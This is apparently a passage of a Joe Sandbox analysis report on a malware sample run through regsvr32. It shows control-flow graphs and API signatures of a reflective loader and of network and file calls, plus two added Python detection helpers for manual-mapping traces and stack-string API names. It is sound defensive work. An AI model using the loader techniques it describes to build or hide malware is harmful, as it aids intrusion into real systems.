                                                                                                                                                -> ee0a00 -> ee0a7b (exit)
                                                                                                                                                          -> ee0a56 RtlAddFunctionTable -> ee0a7b (exit)

                                                                    Root 18000fb00 -> 18000fb80 -> 18000fc15 CreateFileW
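The ee0000 chain in the execution graph above (VirtualAlloc, GetNativeSystemInfo, VirtualAlloc, a VirtualProtect loop, then RtlAddFunctionTable) is the API shape of a manual PE mapper registering its own unwind tables. The following Python is an added example, not part of the Joe Sandbox report or of the sample, that flags that shape in a per-thread API trace. The trace events, the known-image range and the rule itself are constructed for the example; call sites are the block addresses the graph shows, nothing else about the sample is asserted.

```python
"""
Flag a manual-mapping (reflective loader) API sequence in an API trace.

Rule: from call sites that are NOT inside any file-backed image,
VirtualAlloc, then one or more VirtualProtect, then RtlAddFunctionTable,
in that order. Registering unwind info from unbacked memory is rare in
legitimate code and is exactly what a loader must do on x64 so that
exceptions unwind through the mapped image.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiEvent:
    caller: int   # call-site / return address recorded by the tracer
    api: str      # Win32 API name


# Constructed trace modelled on the report's execution graph for ee0000
# (call sites are the block addresses the graph shows).
LOADER_TRACE = [
    ApiEvent(0xEE043E, "VirtualAlloc"),
    ApiEvent(0xEE0531, "GetNativeSystemInfo"),
    ApiEvent(0xEE056D, "VirtualAlloc"),
    ApiEvent(0xEE09D9, "VirtualProtect"),   # one call per section
    ApiEvent(0xEE09D9, "VirtualProtect"),
    ApiEvent(0xEE09D9, "VirtualProtect"),
    ApiEvent(0xEE0A56, "RtlAddFunctionTable"),
]

# Constructed benign trace: ordinary calls from inside a loaded module.
BENIGN_TRACE = [
    ApiEvent(0x7FF6A0001234, "LoadLibraryW"),
    ApiEvent(0x7FF6A0001300, "VirtualAlloc"),
    ApiEvent(0x7FF6A0001350, "VirtualProtect"),
    ApiEvent(0x7FF6A0001400, "RtlAddFunctionTable"),
]


def loaded_image_ranges():
    """Address ranges of file-backed images (constructed for the example;
    in practice take them from the sandbox's module list)."""
    return [(0x7FF6A0000000, 0x7FF6A0100000)]


def is_backed(addr, ranges):
    """True if addr lies inside a known file-backed image."""
    return any(lo <= addr < hi for lo, hi in ranges)


def find_manual_map(trace, image_ranges):
    """Return a dict describing the first manual-mapping chain, or None.

    Calls from backed images never advance the state machine, so a loader
    that interleaves its work with normal library calls is still caught,
    and a normal module doing the same three calls is not.
    """
    state = 0          # 0 idle, 1 saw VirtualAlloc, 2 saw VirtualProtect
    first_site = None
    protects = 0
    for ev in trace:
        if is_backed(ev.caller, image_ranges):
            continue
        if ev.api == "VirtualAlloc" and state == 0:
            state, first_site, protects = 1, ev.caller, 0
        elif ev.api == "VirtualProtect" and state >= 1:
            state, protects = 2, protects + 1
        elif ev.api == "RtlAddFunctionTable" and state == 2:
            return {"first_call_site": first_site, "protect_calls": protects}
    return None


if __name__ == "__main__":
    print("loader:", find_manual_map(LOADER_TRACE, loaded_image_ranges()))
    print("benign:", find_manual_map(BENIGN_TRACE, loaded_image_ranges()))
```

The image-range check is what keeps the rule from firing on legitimate JIT runtimes, which also call RtlAddFunctionTable but do so from code inside a loaded module; widen the rule to those runtimes only with a proper allow-list.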

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph for ee0000 (basic blocks 0-144; edge list reduced to the blocks that matter)
                                                                      Block 0    ee0000-ee0460  call ee0aa8 * 2, VirtualAlloc
                                                                      Block 36   ee0531-ee0567  GetNativeSystemInfo
                                                                      Block 38   ee056d-ee0589  VirtualAlloc
                                                                      Block 132  ee09d9-ee09e9  VirtualProtect; flows to ee09ec-ee09fa, which loops back to ee093b-ee093f or continues to ee0a00-ee0a01
                                                                      Block 107  ee0a56-ee0a79  RtlAddFunctionTable; flows to ee0a7b-ee0a8e
                                                                      Block 27   ee0a91-ee0aa6  common exit, reached directly from ee048a-ee0494, ee049a-ee049e, ee04a4-ee04a8, ee04ae-ee04b2, ee04b8-ee04bf, ee04c5-ee04d2, ee04d8-ee04e1, ee04e7-ee04f4, the GetNativeSystemInfo block and ee0a7b-ee0a8e
                                                                      Self-looping blocks: ee0468-ee0488, ee05ec-ee0609, ee0722-ee0784, ee07f2-ee07f9, ee08ca-ee08d1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743839150.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_ee0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: a536d895039eab51a915c0b39b7b5e3780752f109c1ae9e98df55b85ca5de063
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: 1272E630618B8C8FCB29DF19C8856B9B7E1FB98305F10562DE8CAD7211DB74D986CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
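The String ID for ee0000 above ("Cach$Find$Flus$Free$...$urce") is what Joe Sandbox emits when a function writes API names to the stack four bytes at a time: the report sorts the fragments, so the reader sees "Virt$Virt$ualA$ualP$lloc$rote" instead of VirtualAlloc and VirtualProtect, and any trailing piece shorter than four bytes is not listed at all. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that reassembles such a fragment list against an analyst-supplied candidate list. The candidate list and the greedy longest-first matching are assumptions of the example, and A/W suffixes cannot be distinguished because they fall in the dropped tail.

```python
"""
Reassemble Win32 API names from the sorted 4-byte stack-string fragments
that Joe Sandbox reports as a function's "String ID".

The fragments are treated as a multiset. A candidate name matches if every
full 4-byte chunk of it is still available; the final chunk, if shorter
than 4 bytes, is not required because the sandbox does not report it.
"""
from collections import Counter

# Fragment list copied from the report entry for ee0000.
REPORT_STRING_ID = (
    "Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$"
    "RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$"
    "onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce"
)

# Candidate names: what a manual PE mapper typically resolves. This is the
# analyst's guess (an assumption of the example), not something the report
# states; extend it for other loaders. FindResourceA stands in for the
# A/W pair, which this method cannot tell apart.
CANDIDATES = [
    "VirtualAlloc", "VirtualProtect", "VirtualFree", "GetNativeSystemInfo",
    "RtlAddFunctionTable", "LoadLibraryA", "GetProcAddress", "FindResourceA",
    "LoadResource", "LockResource", "SizeofResource", "FreeResource",
    "FlushInstructionCache", "Sleep", "CreateThread", "FreeLibrary",
]

CHUNK = 4


def chunks(name, size=CHUNK):
    """Split a name into the pieces a 4-byte stack-string writer emits."""
    return [name[i:i + size] for i in range(0, len(name), size)]


def tile(name, pool):
    """Return the full-size fragments `name` consumes from `pool`, or None
    if any of them is unavailable. The short tail chunk is never required."""
    needed = [c for c in chunks(name) if len(c) == CHUNK]
    avail = Counter(pool)
    for c in needed:
        if avail[c] == 0:
            return None
        avail[c] -= 1
    return needed


def recover_api_names(string_id, candidates=CANDIDATES):
    """Greedily match candidates (longest first, so a long name is not
    starved of a shared fragment such as 'Load' by a shorter one).
    Returns (sorted matched names, sorted leftover fragments)."""
    pool = Counter(string_id.split("$"))
    matched = []
    for name in sorted(candidates, key=len, reverse=True):
        used = tile(name, pool)
        if used is not None:
            matched.append(name)
            pool.subtract(used)
    return sorted(matched), sorted(pool.elements())


if __name__ == "__main__":
    names, rest = recover_api_names(REPORT_STRING_ID)
    print("recovered:", ", ".join(names))
    print("unmatched fragments:", rest or "none")
```

Run against the fragment list from this entry, every one of the 38 fragments is consumed and twelve names come back, among them VirtualAlloc, VirtualProtect, GetNativeSystemInfo and RtlAddFunctionTable, which are exactly the APIs the execution graph shows this function calling; a non-empty leftover list is the cue to extend the candidate list.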

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$Ec;$J$^c$^c$n
                                                                    • API String ID: 0-2929744921
                                                                    • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                    • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                    • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                    • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5IF$P)#
                                                                    • API String ID: 0-1025399686
                                                                    • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                    • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                    • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                    • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: :G?$C
                                                                    • API String ID: 3050416762-1225920220
                                                                    • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                    • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                    • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                    • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: gF\
                                                                    • API String ID: 823142352-1982329323
                                                                    • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                    • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                    • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                    • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID: :G?
                                                                    • API String ID: 1984915467-1508054202
                                                                    • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                    • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                    • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                    • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: :G?
                                                                    • API String ID: 2038078732-1508054202
                                                                    • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                    • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                    • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                    • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                    • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                    • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                    • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationVolume
                                                                    • String ID:
                                                                    • API String ID: 2039140958-0
                                                                    • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                    • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                    • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                    • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%